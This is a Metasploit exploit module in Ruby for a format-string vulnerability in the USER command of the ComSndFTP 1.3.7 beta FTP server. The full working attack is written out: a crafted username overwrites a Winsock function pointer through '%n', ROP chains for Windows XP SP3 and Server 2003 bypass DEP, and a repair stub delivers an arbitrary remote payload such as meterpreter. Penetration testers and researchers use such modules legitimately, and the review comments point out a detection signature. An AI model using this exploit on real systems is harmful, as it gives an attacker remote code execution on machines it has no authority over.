GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the ComSndFTP 1.3.7 beta format-string flaw in the FTP
# USER command (see 'Name'/'Description' below). Three methods matter:
# check (banner fingerprint), junk (ROP filler) and exploit (builds and sends
# one oversized USER line).
class MetasploitModule < Msf::Exploit::Remote
  # Framework rank constant for this module.
  Rank = GoodRanking

  # Provides connect/disconnect and the sock accessor used by check and exploit.
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, the two supported targets and the RPORT option.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',
        'Description' => %q{
          This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
          crafted format string specifier as a username. The crafted username is sent to the server to
          overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
          is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
          The SEH exit function is preferred so that the administrators are not left with an unhandled
          exception message. When using the meterpreter payload, the process will never die, allowing
          for continuous exploitation.
        },
        'Author' => [
          'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc
          'rick2600 <rick2600[at]corelan.be>', # msf module (target XP)
          'mr_me <mr_me[at]corelan.be>', # msf module (target 23k)
          'corelanc0d3r <peter.ve[at]corelan.be>' # msf module
        ],
        'Arch' => [ ARCH_X86 ],
        'License' => MSF_LICENSE,
        'References' => [
          # When a DoS is NOT a DoS
          [ 'OSVDB', '82798'],
          [ 'EDB', '19024']
        ],
        'DefaultOptions' => {
          # Rationale for the SEH exit function is given in 'Description' above.
          'EXITFUNC' => 'seh'
        },
        'Platform' => ['win'],
        'Privileged' => false,
        'Payload' => {
          'Space' => 1000, # upper bound on payload.encoded, which exploit appends after the stage1 stub
          'BadChars' => "\x00\x0a\x0d", # NUL plus CR/LF: the USER line built in exploit is CRLF-terminated
          'StackAdjustment' => -3500,
          'DisableNops' => true # no NOP sled is prepended to the payload
        },
        # Per-target constants read by exploit: Functionpointer (the pointer that is
        # overwritten and later repaired), Functionaddress (the value stage1 writes
        # back), Pivot (used as the width of the leading %x directive) and Pad
        # (length of the random filler placed before the ROP chain).
        'Targets' => [
          [
            'Windows XP SP3 - English',
            {
              'Functionpointer' => 0x71AC4050, # winsock pointer
              'Functionaddress' => 0x71AB2636, # the repair address
              'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
              'Pad' => 568
            }
          ],
          [
            'Windows Server 2003 - English',
            {
              'Functionpointer' => 0x71C14044, # winsock pointer
              'Functionaddress' => 0x71C02661, # the repair address
              'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
              'Pad' => 568
            }
          ]
        ],
        'DisclosureDate' => '2012-06-08',
        # Reliability, stability and side effects have not been assessed for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(21),
      ]
    )
  end

  # Fingerprints the service by its greeting banner.
  #
  # Connects, reads whatever the server sends first, disconnects, and compares
  # the bytes with the greeting of the affected build. The expected greeting
  # starts with the FTP status code "220 " and contains "FTP"; the remaining
  # high bytes appear to be a non-ASCII welcome text (locale not verified here).
  #
  # @return [Exploit::CheckCode] Vulnerable on an exact banner match, Safe otherwise
  #
  # NOTE(review): the comparison is exact, so a different locale, a reconfigured
  # greeting or another build is reported as Safe even if the flaw is present;
  # Unknown would be the more honest result for a non-matching banner.
  def check
    connect
    banner = sock.get_once || "" # get_once may return nil; treat that as an empty banner
    disconnect

    validate = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
    validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
    validate << "\xf1\xc6\xf7\x21\x0d\x0a"

    if banner.to_s == validate
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Returns a random 32-bit little-endian value ("V" = unsigned 32-bit LE)
  # built from n random alphabetic bytes. Used in exploit as throwaway filler
  # for the `pop ebp` slots of the ROP chains.
  #
  # @param n [Integer] number of random bytes to draw; only the first four are
  #   unpacked, and fewer than four yields nil. Every caller here uses the default.
  # @return [Integer, nil]
  def junk(n = 4)
    return rand_text_alpha(n).unpack("V").first
  end

  # Builds the malicious USER line and sends it, then hands over to the handler.
  #
  # Layout of the USER argument, in order: 7 random bytes, the target's
  # Functionpointer as a LE dword, a "%<Pivot>x" width directive, 208 "%p"
  # directives followed by one random character and "%n", Pad random bytes,
  # the target-specific ROP chain, the assembled stage1 stub, the encoded
  # payload, random filler sized to bring the tail (from Pad on) to 2000 bytes,
  # and CRLF. The argument is therefore well over 2000 bytes and carries
  # repeated "%p" plus "%n", a pattern unlikely in a legitimate username and a
  # usable detection signature for this traffic.
  #
  # NOTE(review): offset uses stage1.length, the length of the assembly *source*
  # text, whereas the bytes appended are the assembled stub, so the filler does
  # not make the tail exactly 2000 bytes; confirm whether the total length
  # matters. rop also stays empty when target.name matches neither pattern,
  # which the two declared targets prevent.
  def exploit
    rop = ''
    # Gadget addresses live in msvcrt.dll of the named target build (version in
    # the comment); the per-gadget annotations are the original author's.
    if target.name =~ /Server 2003/
      # C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959
      rop = [
        0x77be3adb, # pop eax ; retn
        0x77ba1114, # <- *&VirtualProtect()
        0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
        junk,
        0x77bb0c86, # xchg eax,esi ; retn
        0x77be3adb, # pop eax ; retn
        0xFFFFFBFF, # dwSize
        0x77BAD64D, # neg eax ; pop ebp ; retn
        junk,
        0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
        0x77bbfc02, # pop ecx ; retn
        0x77bef001, # ptr that is w+
        0x77bd8c04, # pop edi ; retn
        0x77bd8c05, # retn
        0x77be3adb, # pop eax ; retn
        0xFFFFFFC0, # flNewProtect
        0x77BAD64D, # neg eax ; pop ebp ; retn
        0x77be2265, # ptr to 'push esp ; ret'
        0x77BB8285, # xchg eax,edx ; retn
        0x77be3adb, # pop eax ; retn
        0x90909090, # nops
        0x77be6591, # pushad ; add al,0ef ; retn
      ].pack("V*")

    elsif target.name =~ /XP SP3/
      # C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512
      rop = [
        0x77C21D16, # pop eax ; retn
        0x77C11120, # <- *&VirtualProtect()
        0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
        junk,
        0x77C21891, # pop esi ; retn
        0x77C5D010, # ptr that is w+
        0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
        0x77C21D16, # pop eax ; retn
        0xFFFFFBFF, # dwSize
        0x77C1BE18, # neg eax ; pop ebp ; retn
        junk,
        0x77C2362C, # pop ebx ; retn
        0x77C5D010, # ptr that is w+
        0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
        0x77C1F519, # pop ecx ; retn
        0x77C5D010, # ptr that is w+
        0x77C23B47, # pop edi ; retn
        0x77C23B48, # retn
        0x77C21D16, # pop eax ; retn
        0xFFFFFFC0, # flNewProtect
        0x77C1BE18, # neg eax ; pop ebp ; retn
        0x77C35459, # ptr to 'push esp ; ret'
        0x77C58FBC, # xchg eax,edx ; retn
        0x77C21D16, # pop eax ; retn
        0x90909090, # nops
        0x77C567F0, # pushad ; add al,0ef ; retn
      ].pack("V*")
    end

    # Stub assembled with Metasm below: stores Functionaddress back into
    # Functionpointer (the "repair" the description refers to).
    stage1 = %Q{
      mov eax, #{target['Functionpointer']}
      mov ecx, #{target['Functionaddress']}
      mov [eax], ecx
    }

    offset_wp = rand_text_alphanumeric(1) # single random character placed right before %n
    pivot = target['Pivot']
    # Length of everything from Pad through the payload; the trailing filler
    # is sized as 2000 minus this (see the review note on stage1.length).
    offset = target['Pad'] + rop.length + stage1.length + payload.encoded.length

    attackstring = rand_text_alphanumeric(7)
    attackstring << [target['Functionpointer']].pack('V')
    attackstring << "%#{pivot}x" # special pointer to our pivot
    attackstring << "%p" * 208 + "#{offset_wp}%n" # format specifiers to read and write the function pointer
    attackstring << rand_text_alphanumeric(target['Pad'])
    attackstring << rop
    attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string
    attackstring << payload.encoded
    attackstring << rand_text_alphanumeric(2000 - offset)
    attackstring << "\r\n"

    sploit = "USER #{attackstring}\r\n"

    print_status("Triggering overflow...")
    connect
    sock.get_once(1024) # read and discard up to 1024 bytes (presumably the greeting) before sending
    sock.put(sploit)
    select(nil, nil, nil, 2) # wait two seconds before starting the payload handler
    handler
    disconnect
  end
end